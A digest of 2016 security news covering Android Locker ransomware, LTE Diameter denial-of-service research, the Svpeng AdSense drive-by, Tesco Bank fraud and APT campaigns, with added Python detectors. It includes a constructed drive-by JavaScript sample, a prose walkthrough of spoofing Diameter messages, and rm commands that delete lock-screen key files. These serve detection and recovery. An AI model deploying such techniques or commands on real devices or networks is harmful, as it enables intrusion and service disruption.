A couple of days before the 2016 Presidential election, WikiLeaks published a new set of emails hacked from the Democratic National Committee (DNC). The new set, dubbed DNCLeak2, includes 8,200 emails, added to the more than 50,000 emails already leaked from the DNC.

WikiLeaks (@wikileaks), 7 Nov 2016: "RELEASE: 8263 new emails from the DNC #DNCLeak2 #feelthebern #imwithher #demexit …"
In one of the leaked emails, the former Clinton Foundation fundraiser Doug Band was slamming Chelsea Clinton for allegedly using the funds from the Clinton Foundation to pay for her wedding.

Early Monday morning, a few hours after publishing DNCLeak2, WikiLeaks was targeted by a massive DDoS attack. The organization announced the attack via Twitter shortly after it released the DNC emails.

WikiLeaks (@wikileaks), 7 Nov 2016: "Our email publication servers are under a targeted DoS attack since releasing #DNCLeak2. You can increase capacity:"
Evidently, someone disagreed with WikiLeaks’ decision to release this trove of emails before the presidential election.

Below is the message posted by WikiLeaks on its Facebook page: “Wikileaks Update: We are still under a DoS attack on our e-mail publication servers and it appears that Twitter is down as well, we are unable to confirm if this is an attack on twitter at this time.“

WikiLeaks was not the only website that reported an outage; Twitter also went down for at least 30 minutes, but the two events appear to be uncorrelated.

Users on the Internet immediately linked the two incidents, speculating about censorship by the US Government.
“Twitter went down because Wikileaks released #DNCleak2 It has begun! They are trying to suppress the truth from coming out!!!,” a Twitter user said.

“So Twitter was down due to the #DNCLeak2 released by @wikileaks – we should be worried, global censorship is heading our way,” another user said.

Technical analysis of the Locker virus on mobile phones
8.11.2016 securityaffairs Mobile

Security experts from Cheetah Mobile Security Research Lab published an interesting technical analysis of the mobile variant of the Locker virus.
Blatant malicious behavior of the Locker virus

The Locker virus can easily be identified by its blatant malicious behavior. Here are the tell-tale signs:

Windows appear on top of the home screen and prevent users from using their phones.
The “Activate device administrator” page is displayed repeatedly in order to force users to grant the virus administrator access to the system.
Once the administrator is activated, the virus changes the lock screen password.
The virus then keeps the users’ contact information and uses it to extort money.

Screenshot of an infected phone.

Infections of the Locker virus

The worst-hit areas of the Locker virus in China are shown in Figure 1 below. About 3,000 users are infected on a daily basis.

Figure 1. Locker virus infections in China.

Figures 2 and 3 show the Locker virus infections worldwide in the last 15 days. The infections are spread across many countries, with most of them in Russia.

Figure 2. Locker virus infections worldwide in the last 15 days.

Figure 3. Map view of the Locker virus infections worldwide in the last 15 days.

Don’t be tricked by the Locker virus

The Locker virus mainly disguises itself as system applications, like Android Update, Voice Assistant, and Adobe Flash Player. However, it can also appear as other applications, like adult video players, bank apps, and popular games, as shown in Figure 4.

Figure 4. The many disguises of the Locker virus.

How does the Locker virus work?
Here are the various methods the Locker virus uses to lock a mobile screen:

Added in API level 1


Window type: An internal system error windows appear on the top of the screen. In multi-user systems, it only appears on the primary user’s window.

Constant Value: 2010 (0x000007da)

The internal system error window is displayed in front of all other windows (Figure 5).

locker virus 6
Figure 5. The internal system error window.


Added in API level 1


Window flag: All screen decorations (such as the status bar) are hidden when an app window with a flag set is on the top layer. This allows the window to use the entire display. A fullscreen window will ignore a value of SOFT_INPUT_ADJUST_RESIZE for the window’s softInputMode field; the window will stay fullscreen and will not resize.

Constant Value: 1024 (0x00000400)

It will hide all other content on the screen and only allow the current window to use the fullscreen.


Window flag, constant value 256 (0x00000100), added in API level 1: places the window within the entire screen, ignoring decorations around the border (such as the status bar). The window must correctly position its content to take the screen decoration into account. This flag is normally set (see Figure 6) by the WindowManager, as described in setFlags(int, int).

It places the window over the whole screen.

Figure 6. This flag is normally set by the WindowManager.

Window type, constant value 2002 (0x000007d2), added in API level 1: non-application windows that provide user interaction with the phone (such as incoming calls). These windows are normally placed above all applications but behind the status bar. In multi-user systems they show on all users' windows (see Figure 7).

This window will be covered when there is an incoming call. Otherwise, the window is always in the top position, under the status bar.

Figure 7. The window will be covered when there’s an incoming call.

Window type, constant value 2005 (0x000007d5), added in API level 1: transient notifications. In multi-user systems it only shows on the primary user's window.

This window is not a floating window as such, but it has the floating window's function and can be displayed on the top layer (Figure 8).

Figure 8. The window can be displayed on the top layer.

The virus keeps displaying the top layer activity. If the top layer is not activated, the virus will close and reopen it (Figure 9).

Figure 9. Circular display of the top layer activity.

When the virus obtains administrator privileges, it changes the screen lock password (Figure 10).

Figure 10. With administrator privileges, the virus can change the lock screen password.

Of all the methods mentioned above, the virus most frequently uses the flag TYPE_SYSTEM_ERROR to lock the screen. The second most common method is the circular display of the top layer activity. The proportions of these two methods are 16% and 84%, respectively, as shown in Figure 11.

Figure 11. The virus most frequently uses the flag TYPE_SYSTEM_ERROR to lock the screen.
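
The window types and flags listed above can be turned into a quick triage check for a suspicious app. The following is an added example, not code from the original article: it decodes the numeric type and flag values the article lists into names and rates how well the combination can cover the screen. Only TYPE_SYSTEM_ERROR is named in the article; the other constant names are the matching android.view.WindowManager.LayoutParams constants identified from their values, and the risk levels are an assumption made for this example.

```python
"""Rate how much a window's type/flags can be used to lock the screen.

Added example, not code from the original article.  The numeric values are the
ones the article lists; the constant names are the matching
android.view.WindowManager.LayoutParams constants (only TYPE_SYSTEM_ERROR is
named in the article, the others are identified here from their values).
"""
from __future__ import annotations

# Window types the article describes as usable for covering the screen
WINDOW_TYPES = {
    2002: "TYPE_PHONE",         # above apps, below the status bar; covered by incoming calls
    2005: "TYPE_TOAST",         # transient notification layer, can be drawn on top
    2010: "TYPE_SYSTEM_ERROR",  # internal error window, displayed in front of all others
}

# Window flags the article describes (bit values)
FLAG_LAYOUT_IN_SCREEN = 0x00000100  # 256: window occupies the whole screen area
FLAG_FULLSCREEN = 0x00000400        # 1024: hides the status bar and other decorations
WINDOW_FLAGS = {
    FLAG_LAYOUT_IN_SCREEN: "FLAG_LAYOUT_IN_SCREEN",
    FLAG_FULLSCREEN: "FLAG_FULLSCREEN",
}


def decode_flags(flags: int) -> list[str]:
    """Return the names of known flag bits set in `flags`; unknown bits are kept as hex."""
    names = [name for bit, name in sorted(WINDOW_FLAGS.items()) if flags & bit]
    unknown = flags & ~sum(WINDOW_FLAGS)
    if unknown:
        names.append(f"0x{unknown:08x}")
    return names


def assess_window(window_type: int, flags: int, device_admin: bool = False) -> dict:
    """Classify one window found by static or runtime analysis of an app.

    Risk levels (an assumption made for this example):
      high   - an overlay type plus both full-screen flags, or an overlay type in an
               app that also holds device-admin rights (it can then reset the lock screen
               password, as the article describes)
      medium - an overlay type without the full-screen flags
      low    - an ordinary application window
    """
    type_name = WINDOW_TYPES.get(window_type, f"type {window_type}")
    flag_names = decode_flags(flags)
    covers_screen = bool(flags & FLAG_LAYOUT_IN_SCREEN) and bool(flags & FLAG_FULLSCREEN)
    overlay = window_type in WINDOW_TYPES
    if overlay and (covers_screen or device_admin):
        risk = "high"
    elif overlay:
        risk = "medium"
    else:
        risk = "low"
    return {"type": type_name, "flags": flag_names, "risk": risk}


def triage(windows: list[tuple[int, int]], device_admin: bool = False) -> str:
    """Overall verdict for an app: the highest risk of any of its windows."""
    order = {"low": 0, "medium": 1, "high": 2}
    worst = "low"
    for wtype, flags in windows:
        risk = assess_window(wtype, flags, device_admin)["risk"]
        if order[risk] > order[worst]:
            worst = risk
    return worst


if __name__ == "__main__":
    # Constructed sample: a fake "Android Update" app drawing a system-error window with
    # both flags (0x500 = 1280), and a second app whose only overlay is a toast window
    # but which has been granted device-admin rights.
    print(assess_window(2010, 0x500))
    print(triage([(1, 0), (2005, 0)], device_admin=True))
```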

Ways to protect your mobile phone

You can protect your mobile device from the Locker virus. Here's how:

Do not install or open apps from unknown sources.
Do not grant administrator privileges to any unknown app.
Enable USB debugging so that you can connect your mobile device to a computer and remove the virus from there, or delete it through other methods when necessary.
Another option is to flash a third-party recovery, such as TWRP.

Got Locked? We have solutions!

Here are some solutions to get rid of the Locker virus if your mobile device is infected:

If USB debugging has been enabled on the phone, you can run the following commands from a computer to delete the Locker virus:
Run 'pm list packages -3' to find the package name of the virus.
Run 'pm uninstall pkg' to delete the virus.
Reboot the phone into recovery mode, and then use the file management function of a third-party recovery tool to delete the APK file in '/data/app/pkg'.
If the device administrator has been activated and USB debugging is enabled, and the phone is rooted, you can forcibly delete the virus and the files where the screen unlock password is stored. This is how the virus can be cleared:
rm -r /data/app/pkg (the virus's package directory)
rm /data/system/password.key
rm /data/system/gesture.key

Abusing protocols in LTE networks to knock mobile devices off networks
8.11.2016 securityaffairs Mobil

A group of researchers from Nokia Bell Labs and Aalto University in Finland demonstrated how protocols used in LTE networks can be abused.
We have discussed several times the role of the SS7 signaling protocol in mobile communications and how its flaws can be exploited to track users.

When mobile users travel between countries, their mobile devices connect to the infrastructure of a local operator, which communicates with their operator back home. The SS7 protocol is what makes roaming possible, but as explained it is also affected by many vulnerabilities that could be exploited for:

Location tracking.
Denial of service against users and the network.
Credential theft.
Data session hijacking.
Unblocking stolen phones.
SMS interception.
One-time password theft and account takeover for Telegram, Facebook and WhatsApp.
Diameter is considered the evolution of the SS7 protocol for modern Long-Term Evolution (LTE) networks and is supposed to be more secure than its predecessor, isn't it?

However, the experts discovered that Diameter is also affected by security issues; one of them is that implementation of the Internet Protocol Security (IPsec) protocol is not mandatory.

According to researchers from Nokia Bell Labs and Aalto University in Finland, this means that Diameter could be hacked with the same techniques that are effective against SS7.

The team of experts ran several tests to evaluate attacks against users connected to the LTE network. They simulated the attacks on a test network set up by an unnamed global mobile operator. In the tests, they launched an attack against UK subscribers from Finland and discovered several methods of disrupting service to users.

The researchers were able to shut down users' connections both temporarily and permanently, and they were also able to target entire regions.

The team presented the results of tests at the Black Hat Europe security conference in London.

In order to launch the attack against another operator's systems or subscribers, the researchers need access to the private interconnection network (IPX). The experts demonstrated that there are several ways to access IPX; for example, a persistent attacker like a government could oblige a local operator to grant access to it.

Attackers could act as a virtual network operator and get access to the roaming network through an existing operator. They could also hack into one of the nodes run by an operator that is accessible from the internet. Let's take a closer look at LTE networks and their main components:

LTE Networks

The nodes of LTE networks are called Mobility Management Entities (MMEs); they provide session management, subscriber authentication, roaming and handovers to other networks. The signal is spread through cell towers, while the home subscriber server (HSS) is the component that holds the master subscriber database. Other essential components of LTE networks are the Diameter Edge Agents (DEAs), which work as gateways to the interconnection network via IPX providers.

In the attack scenario, the hacker needs the victim's international mobile subscriber identity (IMSI), a piece of information that is quite easy to obtain by targeting the IPX network and masquerading as a Short Message Service Center (SMSC) that is trying to deliver a text message to the victim's phone number. This means that knowledge of the victim's phone number, aka Mobile Station International Subscriber Directory Number (MSISDN), and of the DEA of the victim's operator is all you need to carry out the attack against a specific user.

The attacker sends a routing information request through the DEA to the operator's HSS, which will respond with the subscriber's IMSI as well as the identity of the MME the subscriber is connected to.

Great now the attacker has the info to start the attack!

At this point, the attacker masquerading as a partner’s HSS sends a Cancel Location Request (CLR) message to the victim’s MME causing the disconnection of the specific subscriber.

The CLR messages are normally used inside the LTE network when subscribers switch from one MME to another because of a change in location.

The researchers also highlighted another possible way to exploit this mechanism to obtain a sort of amplification factor for the request: they noticed that when a subscriber re-attaches, their device sends 20 different messages to the MME.


Imagine the case in which the attackers force the detachment of hundreds of subscribers at the same time: the MME will be flooded with 're-attach' messages, causing a DoS in the large areas covered by Mobility Management Entities.

There is also a second DoS attack scenario in which the attackers can impersonate an HSS and send an Insert Subscriber Data Request (IDR) to the victim’s MME with a special value that means no service. This will permanently detach the mobile user from the network because their subscription will be changed in the MME’s records.

In this case, the only way to attach the network again is contacting the mobile operator.
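
From the operator's side, the two scenarios above leave footprints in the MME's Diameter signalling: CLR and IDR commands that did not originate from the home HSS, IDRs carrying a "no service" status, and bursts of re-attach traffic. The following is an added example, not from the article or the researchers' work, that flags these patterns in a constructed log; the log format, host names, the ATTACH pseudo-command (standing for the roughly 20 messages a re-attaching device sends) and the thresholds are assumptions made for this example.

```python
"""Flag the Diameter abuse patterns described above in an MME's signalling log.

Added example, not from the article or the researchers' work.  The log format,
host names, the ATTACH pseudo-command and the thresholds are assumptions
constructed for this example.
"""
from __future__ import annotations
from collections import defaultdict
from dataclasses import dataclass

HOME_HSS = "hss1.home.example"   # assumed Origin-Host of the operator's own HSS
NO_SERVICE = "no_service"        # assumed: how the "no service" IDR value is logged
MSGS_PER_REATTACH = 20           # messages one re-attaching device sends (from the article)
REATTACH_LIMIT = 100             # assumed: attach messages per MME per window that trigger an alert


@dataclass
class DiameterEvent:
    ts: int            # seconds since start of capture (constructed)
    cmd: str           # CLR, IDR or ATTACH
    origin_host: str   # Diameter Origin-Host of the sender
    dest_host: str     # the MME that received the message
    imsi: str
    status: str = ""   # subscriber status carried by an IDR, if any


def parse_log(text: str) -> list[DiameterEvent]:
    """Parse the constructed format: ts cmd origin_host dest_host imsi [status]."""
    events = []
    for line in text.strip().splitlines():
        parts = line.split()
        if len(parts) < 5:
            continue                      # ignore malformed lines
        ts, cmd, origin, dest, imsi = parts[:5]
        status = parts[5] if len(parts) > 5 else ""
        events.append(DiameterEvent(int(ts), cmd, origin, dest, imsi, status))
    return events


def spoofed_hss_commands(events: list[DiameterEvent]) -> list[DiameterEvent]:
    """CLR and IDR are only legitimate from the home HSS; anything else came over the IPX."""
    return [e for e in events if e.cmd in ("CLR", "IDR") and e.origin_host != HOME_HSS]


def no_service_idrs(events: list[DiameterEvent]) -> list[DiameterEvent]:
    """An IDR that sets the subscription to 'no service' detaches the user permanently."""
    return [e for e in events if e.cmd == "IDR" and e.status == NO_SERVICE]


def reattach_storms(events: list[DiameterEvent], window: int = 60) -> dict:
    """Count attach traffic per MME and time window; estimate how many devices were forced off."""
    counts = defaultdict(int)
    for e in events:
        if e.cmd == "ATTACH":
            counts[(e.dest_host, e.ts // window)] += 1
    return {key: {"messages": n, "est_devices": n // MSGS_PER_REATTACH}
            for key, n in counts.items() if n > REATTACH_LIMIT}


def analyse(text: str) -> dict:
    events = parse_log(text)
    return {
        "spoofed": [(e.cmd, e.origin_host, e.imsi) for e in spoofed_hss_commands(events)],
        "no_service": [e.imsi for e in no_service_idrs(events)],
        "storms": reattach_storms(events),
    }


def build_sample_log() -> str:
    """Constructed sample: one legitimate CLR from the home HSS, a CLR and a 'no service'
    IDR injected from a partner realm, then eight devices re-attaching to mme1 within a minute."""
    lines = [
        "10 CLR hss1.home.example mme1.home.example 234150000000001",
        "12 CLR hss.partner.example mme1.home.example 234150000000002",
        "15 IDR hss.partner.example mme1.home.example 234150000000003 no_service",
    ]
    for dev in range(8):
        for n in range(MSGS_PER_REATTACH):
            lines.append(f"{20 + n} ATTACH ue mme1.home.example 2341500000001{dev:02d}")
    return "\n".join(lines)


if __name__ == "__main__":
    for name, finding in analyse(build_sample_log()).items():
        print(name, finding)
```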

As you can see, LTE networks and Diameter are also vulnerable to attack; for this reason, the researchers highlighted the need for further security measures.

For further information, have a look at the slides ("Detach me not DoS attacks against 4G cellular users worldwide from your desk") presented at Black Hat Europe 2016.

Cisco to improve endpoint security with a new cloud service

8.11.2016 SecurityWorld Security
Cisco has introduced AMP for Endpoints, a cloud solution that, according to the vendor, combines threat prevention, detection and response. Cisco wants to use it to simplify endpoint security without relying on an ineffective prevention-only strategy.

By combining threat prevention, detection and response in a single cloud solution delivered as software as a service (SaaS), the new product is said to stop more threats.

Thanks to the cloud model, according to the vendor, it can also respond to threats faster and better prepare organizations for the tricks of today's attackers.

Features of AMP for Endpoints according to the vendor:

Next-generation prevention combining proven and advanced types of security functions, which stops both known and newly emerging threats. The backbone of the system is global threat intelligence from the Cisco Talos team. This lets the product offer built-in integrated sandbox technology for isolating and analysing unknown files.
Better visibility and faster detection thanks to continuous monitoring and shared analytics that uncover hidden attacks. AMP for Endpoints records all activity at the file level and can therefore quickly detect malicious activity and alert the security team. The product has the largest amount of threat data, since it analyses all malicious files that have appeared at Cisco customers.
More effective response built on network visibility and detailed records of the past behaviour of various types of malware: where they entered the network from, where they have been and how they behaved. The product speeds up the process of uncovering malicious software, and the cloud interface makes it possible to search across all enterprise endpoints and easily determine the indicators by which malicious software can be detected.

In addition, Cisco is introducing a new way of buying and deploying its security software, via the Cisco ONE Software licensing program.

China Passes Cybersecurity Law to Tighten its Control over the Internet
7.11.2016 thehackernews Cyber
China has long been known for its strict censorship policies, which have already made it difficult for foreign companies to do business in the world's most populous country of more than 1.35 billion people.
Now, the Chinese government has approved broad new and controversial cybersecurity regulations that would further strengthen the country's censorship regime, making it more difficult for technology companies to operate in the country.
Made public on Monday, the legislation, passed by China's rubber-stamp parliament and set to go into effect in June 2017, aims at combating growing threats like hacking and terrorism, but actually comes with data localization, real-name requirements, and surveillance.
The Cybersecurity Law requires instant messaging services and other internet operators to force users to register with their real names and personal information, which restricts anonymity of a user online.
The proposed law also includes 'data localization' requirements that would force "critical information infrastructure operators" to store their users' data within the country's borders – the same kind of law the Russian government imposed on foreign tech companies.
Chinese Human Rights Watch (HRW) is opposing the legislation, saying that the new law doesn't include any precise definition of infrastructure operators, and will further extend government control over an already heavily monitored and censored media.
"The law will effectively put China's Internet companies, and hundreds of millions of Internet users, under greater state control," HRW's China director Sophie Richardson said in a statement over the weekend.
"Despite widespread international concern from corporations and rights advocates for more than a year, Chinese authorities pressed ahead with this restrictive law without making meaningful changes."
Moreover, the new legislation also covers some new requirements for cyber security, forcing companies to provide "technical support" to government agencies for investigations involving national security and crime and to censor contents that are "prohibited."
Although this technical support is not clearly defined in the law, experts believe that authorities could ask companies for encryption backdoors or other surveillance assistance in the name of tech support.
Under this law, companies and network operators should report "security incidents" to the government and inform consumers of data breaches.
Acts that encourage "overthrowing the socialist system," "fabricating or spreading false information to disturb economic order," and inciting "separatism or damage national unity" are categorized as criminal acts under the new law.
Such requirements have raised serious concerns for users and companies operating in China, where the Internet and online freedom are already heavily censored by the government.

Disassembling a Mobile Trojan Attack
7.11.2016 Kaspersky Mobil
In early August we detected several cases of a banking Trojan being downloaded automatically when users viewed certain news sites on their Android devices. Later it became apparent that this was being caused by advertising messages from the Google AdSense network, and was not restricted to news sites. In fact, any site using AdSense to display adverts could potentially have displayed messages that downloaded the dangerous Trojan-Banker.AndroidOS.Svpeng and automatically saved it to the device’s SD card. This behavior surprised us: typically, the browser warns users about downloading a potentially dangerous file, and offers them a choice of whether or not to save the file. We intercepted traffic coming from the attacked device when this sort of “advert” was displayed, and figured out how the malicious program was downloaded and automatically saved.

Some statistics

First of all, let’s provide some information about the latest versions of Trojan-Banker.AndroidOS.Svpeng. It is limited to Russia and the CIS (more about this later). Below is a graph showing detections of the Trojan’s latest version – Svpeng.q.


And here is the graph for the previous version that was distributed in July 2016, also via AdSense:


As you can see from the graphs, within a two-month period Svpeng was detected on the computers of approximately 318,000 users, with the detection rate peaking at around 37,000 attacked users in one day. The high rates and abrupt changes in the number of detections are easy to explain: Google has been quick to block the ads that the Trojan uses for propagation. However, this is a reactive rather than a proactive approach – the malicious ads were blocked after the Trojan was already on thousands of Android devices. It is also worth noting that there were multiple occasions in the past two months when these ads found their way on to AdSense; similar attacks have been occurring up to the present time, with the most recent attack registered on 12 September 2016.

Now for the juicy part


Let’s look at how the displaying of an ad is related to the automatic download of the APK file containing the Trojan and it being saved to the SD card. Below is the HTTP request that leads to the cybercriminals’ advert being displayed:


In response to this request, the server sends a Javascript script that displays the ad message. However, this script contains a hidden surprise: at the beginning there is some heavily obfuscated code. Let’s look, step by step, at what this code actually does:

Declares the variables necessary for operation and deciphers the payload:

We can see that the APK file was downloaded in the form of an encrypted array of bytes in the script. Now it just needs to be saved to the SD card.

Defines the function that will save the file.

The code checks the availability of functions from various browser engines, and if they are unavailable, defines its own function. The object URL and the element <a> (the latter being an HTML notation for a link) are created in this function. The resulting link is assigned the attribute ‘href’ (where the link leads to), and the malicious program emulates a click on this link. This method is not new; quite possibly the Trojan’s creators borrowed it from here, and only added obfuscation and a restriction: the click simulation is only done on touchscreen devices, which for the most part are smartphones.

Breaks the decrypted APK file into blocks of 1024 bytes.

Sets the handler for a page load event. Handler activation initiates the automatic saving of the APK file to the SD card.

Apart from the extra checks to see if the script runs on the smartphone or not, there is an important check in the code to identify the language used on the device. The attackers only target smartphones with a Russian-language interface – these are typically devices belonging to users in Russia and, to a lesser degree, CIS states.

Where’s the catch?

The method described above only works in Google Chrome for Android. When an APK file is downloaded via a link leading to an external web resource, the browser displays a warning that a potentially dangerous object is being downloaded, and prompts the user to choose whether or not to save the file.


When an APK file is broken down into pieces and handed over to the save function via the Blob() class, there is no check of the type of the content being saved, so the browser saves the APK file without notifying the user.
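
The behaviour described above can be turned into a detection heuristic for scripts served through ad networks. The following is an added example, not code from the original article: it scores a deobfuscated script for the combination of indicators the analysis describes (Blob assembled from chunks, object URL, simulated click on an anchor, touchscreen and language checks, automatic trigger on page load). The indicator list, weights and threshold are assumptions made for this example, and the two sample scripts are constructed; since the real ad script was heavily obfuscated, the scanner is meant to run on scripts after deobfuscation, as the analysts above did.

```python
"""Score a (deobfuscated) web script for the silent APK download behaviour
described above.  Added example, not code from the original article; the
indicator list, weights, threshold and sample scripts are constructed here."""
from __future__ import annotations
import re

# (pattern, weight, description).  Blob + object URL + <a>.click() also occur in
# legitimate "download this report" code, so those score low; the device targeting
# checks and the automatic trigger on page load are what distinguish the drive-by.
INDICATORS = [
    (r"new\s+Blob\s*\(", 1, "builds a Blob from byte chunks"),
    (r"createObjectURL\s*\(", 1, "creates an object URL for the Blob"),
    (r"createElement\s*\(\s*['\"]a['\"]\s*\)", 1, "creates an <a> element"),
    (r"\.download\s*=", 1, "sets a download file name"),
    (r"\.click\s*\(\s*\)", 1, "simulates a click on the link"),
    (r"\.apk['\"]", 2, "file name ends in .apk"),
    (r"ontouchstart|TouchEvent|maxTouchPoints", 2, "only acts on touchscreen devices"),
    (r"navigator\.(language|userLanguage)", 2, "checks the interface language"),
    (r"addEventListener\s*\(\s*['\"]load['\"]|window\.onload", 2, "runs automatically on page load"),
]
ALERT_THRESHOLD = 8   # assumed: a benign download button scores 5 at most


def scan_script(src: str) -> dict:
    """Return the indicator hits, their weighted score and a suspicious verdict."""
    score = 0
    hits = []
    for pattern, weight, desc in INDICATORS:
        if re.search(pattern, src):
            score += weight
            hits.append(desc)
    return {"score": score, "hits": hits, "suspicious": score >= ALERT_THRESHOLD}


# Constructed benign sample: an export button that offers a CSV file on user click.
BENIGN_SAMPLE = """
document.getElementById('export').addEventListener('click', function () {
  var blob = new Blob([csvText], {type: 'text/csv'});
  var a = document.createElement('a');
  a.href = URL.createObjectURL(blob);
  a.download = 'report.csv';
  a.click();
});
"""

# Constructed drive-by sample mirroring the steps described in the analysis
# (payload decoding into 1024-byte chunks is elided; `chunks` is not defined here).
DRIVE_BY_SAMPLE = """
window.addEventListener('load', function () {
  if (!('ontouchstart' in window)) return;             // smartphones only
  if (navigator.language.indexOf('ru') !== 0) return;  // Russian-language devices only
  var blob = new Blob(chunks, {type: 'application/octet-stream'});
  var a = document.createElement('a');
  a.href = URL.createObjectURL(blob);
  a.download = 'Android_Update.apk';
  a.click();
});
"""


if __name__ == "__main__":
    for label, sample in (("benign", BENIGN_SAMPLE), ("drive-by", DRIVE_BY_SAMPLE)):
        print(label, scan_script(sample))
```

A regex heuristic like this is only as good as the deobfuscation in front of it; the distinguishing signal is the automatic load-time trigger plus the targeting checks, not the Blob download itself.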

We notified Google about this browser behavior and that it was being exploited to distribute malicious content. At the time of publishing a patch had been released that fixed this problem in Google Chrome and will become available to users the next time the browser is updated.

In all other browsers, this method either does not work, or the user is asked if they want to save the file or not. Kaspersky Lab recommends updating Google Chrome to prevent infection by the malware when viewing sites that use AdSense.


Of course, just downloading the Trojan is not enough for it to work; the user also has to install it. To ensure this, the attackers resort to social engineering. The Trojan may be downloaded with any of the following names:

These names imitate the names of popular legitimate apps or try to convince users that the downloaded app is important and has to be installed. In the latest versions of Android, installation of apps downloaded from unknown sources is blocked by default, but the cybercriminals are obviously counting on users disabling this setting to install an “important browser update” or a newer version of a popular app that is already on their phone.

So far, those behind Svpeng have limited their attacks to smartphone users in Russia. However, next time they push their “adverts” on AdSense they may well choose to attack users in other countries; we have seen similar cases in the past. After all, what could be more convenient than exploiting the most popular advertising platform to download their malicious creations to hundreds of thousands of mobile devices?

Tesco Bank suspended all online transactions due to a cyber heist

7.11.2016 securityaffairs Crime

Tesco Bank halted all online transactions after a cyber heist affected thousands of its customers. An investigation is ongoing.
Tesco Bank is adopting a strong measure in response to a cyber attack: the financial institution will freeze customers' online transactions. The measure was announced by chief executive Benny Higgins; the bank has admitted that 40,000 of its 136,000 current account customers had their accounts hacked over the weekend, and unfortunately 50 percent of them have lost money.

Tesco Bank has been owned by Tesco PLC since 2008 and currently has 7.8 million customer accounts. Tesco confirmed that it detected suspicious activity within accounts "late on Saturday night and in the early hours of Sunday morning."

Higgins explained that the bank has adopted the emergency security measure in response to the cyber heist.
“We apologise for the worry and inconvenience that this has caused for customers, and can only stress that we are taking every step to protect our customers’ accounts,” said Mr Higgins.

“That is why, as a precautionary measure, we have taken the decision today to temporarily stop online transactions from current accounts.”

The bank reported the incident to the authorities and is currently supporting an ongoing investigation. The online banking service will resume "when we are on top of the issue", Mr Higgins told BBC Radio 4's Today programme.
This attack will be remembered for the number of customers affected and the emergency measure adopted by the financial institution.

Tesco has downplayed the amount of money that was stolen from customers' accounts; in any case the bank will refund all losses, and it has apologized for the poor customer service experienced by users who tried to get information by calling the bank over the weekend.


According to the Telegraph, one man said his available balance had dropped by £700 even though he had not made any transaction.

"We have been hacked, all money gone, no email or text! Appalling response from Tesco so far nobody answering," one customer said.
While security experts are trying to identify the threat actor behind the attack, Mr Higgins refused to speculate on the possible culprit.

"In the modern world it is impossible to be totally impregnable. We are in dialogue with the national crime agencies and with the Financial Conduct Authority," he said.

Cyber fraudsters relieved 20,000 Tesco Bank customers of their money

7.11.2016 Novinky/Bezpečnost Crime
This time the target of a cyber attack was customers of the British financial company Tesco Bank. Cyber fraudsters managed to move money out of roughly 20,000 accounts at the banking division of Tesco, Britain's largest retail chain. The company has promised to compensate customers for the resulting financial losses.
Tesco Bank manages roughly 136,000 current accounts. In response to the attack the company halted all online transactions, but customers can continue to use their payment cards for purchases and cash withdrawals.

"The bank will bear all financial losses arising from this fraudulent activity," said chief executive Benny Higgins. "Customers are not at any financial risk," he added.

According to Higgins, over the weekend the company recorded suspicious activity on roughly 40,000 accounts, and the attackers managed to transfer money out of roughly half of them. "We believe the amounts that disappeared are relatively small, but we are still working on it," Higgins said.

According to Higgins, the total cost of compensating customers will be a "large" but not "huge" sum. Reuters nevertheless points out that even with a limited financial impact, Tesco Bank faces significant damage to its reputation.

IT threat evolution Q3 2016

7.11.2016 Kaspersky Analysis

Targeted attack campaigns don’t need to be technically advanced in order to be successful. In July 2016 we reported on a group called Dropping Elephant (also known as ‘Chinastrats’ and ‘Patchwork’). Using a combination of social engineering, old exploit code and some PowerShell-based malware this group was able to steal sensitive data from its victims.

This group, which has been active since November 2015, targets high profile diplomatic and economic organizations linked to China’s foreign relations – an interest that is evident from the themes the attackers use to trap their victims.

The attackers use a combination of spear-phishing e-mails and watering-hole attacks. The first involves sending a document with remote content. When the victim opens the document, a ping request is sent to the attackers’ Command-and-Control (C2) server. The victim then receives a second spear-phishing e-mail, containing either a Word document or a PowerPoint file (these exploit old vulnerabilities – CVE-2012-0158 and CVE-2014-6352 respectively). Once the payload has been executed, a UPX-packed AutoIT executable is dropped on to the system: once executed, this downloads further components from the C2 server and the theft of data from the victim’s computer begins.

In Q3 2016, @kaspersky repelled 172m malicious attacks via online resources located in 191 countries #KLreport #Infosec

The attackers also created a watering-hole website that downloads genuine news articles from legitimate websites. If a visitor wants to view the whole article, they are prompted to download a PowerPoint file: this reveals the rest of the document, but also asks the victim to download a malicious object. The attackers sometimes e-mail links to their watering-hole website. In addition, they maintain Google+, Facebook and Twitter accounts, to develop relevant search engine optimization (SEO) and to reach out to wider targets.

The success of the Dropping Elephant group is striking given that no zero-day exploits or advanced techniques were used to target high-profile victims – it’s clear that by applying security updates and improving the security awareness of staff, the success of attacks like this can be prevented. At the start of the year we predicted that APT groups would invest less effort in developing sophisticated tools and make greater use of off-the-shelf malware. Dropping Elephant provides a further example of how low investment and use of ready-made toolsets can be very effective when combined with high quality social engineering.


In September, our Anti-Targeted Attack Platform flagged an anomaly in the network of a customer’s organization. Further investigation led us to uncover ProjectSauron, a group that has been stealing confidential data from organizations in Russia, Iran and Rwanda – and probably other countries – since June 2011. We have identified more than 30 victims: the target organizations all play a key role in providing state services and come from government, military, scientific research, telecommunications and financial sectors.


ProjectSauron is particularly focused on obtaining access to encrypted communications, hunting for them using an advanced, modular cyber-espionage platform that incorporates a set of unique tools and techniques. The cost, complexity, persistence and the ultimate goal of the operation (i.e. stealing secret data from state-related organizations) suggest that ProjectSauron is a state-sponsored campaign. ProjectSauron gives the impression of an experienced threat group that has made a considerable effort to learn from other highly advanced attacks, including Duqu, Flame, Equation and Regin – adopting some of their most innovative techniques and improving on their tactics in order to remain undiscovered.


One of the most noteworthy features of ProjectSauron is the deliberate avoidance of patterns: the implants used by the group are customized for each victim and are never re-used. This makes the use of traditional Indicators of Compromise (IoC) almost useless. This approach, along with the use of multiple routes for the exfiltration of stolen data (such as legitimate e-mail channels and DNS) enables ProjectSauron to conduct well-hidden, long-term spying campaigns in targeted networks.

Key features of ProjectSauron:

core implants that are unique for each victim;
use of legitimate software update scripts;
use of backdoors that download new modules or run commands in memory only;
focus on information relating to custom network encryption software;
use of low-level tools orchestrated by high-level LUA scripts (the use of LUA is very rare – previously seen only in the Flame and Animal Farm attacks);
use of specially prepared USB drives to jump across air-gapped networks, with hidden compartments for storing stolen data;
use of multiple exfiltration mechanisms to conceal transfer of data in day-to-day traffic.
The method used to initially infect victims remains unknown.

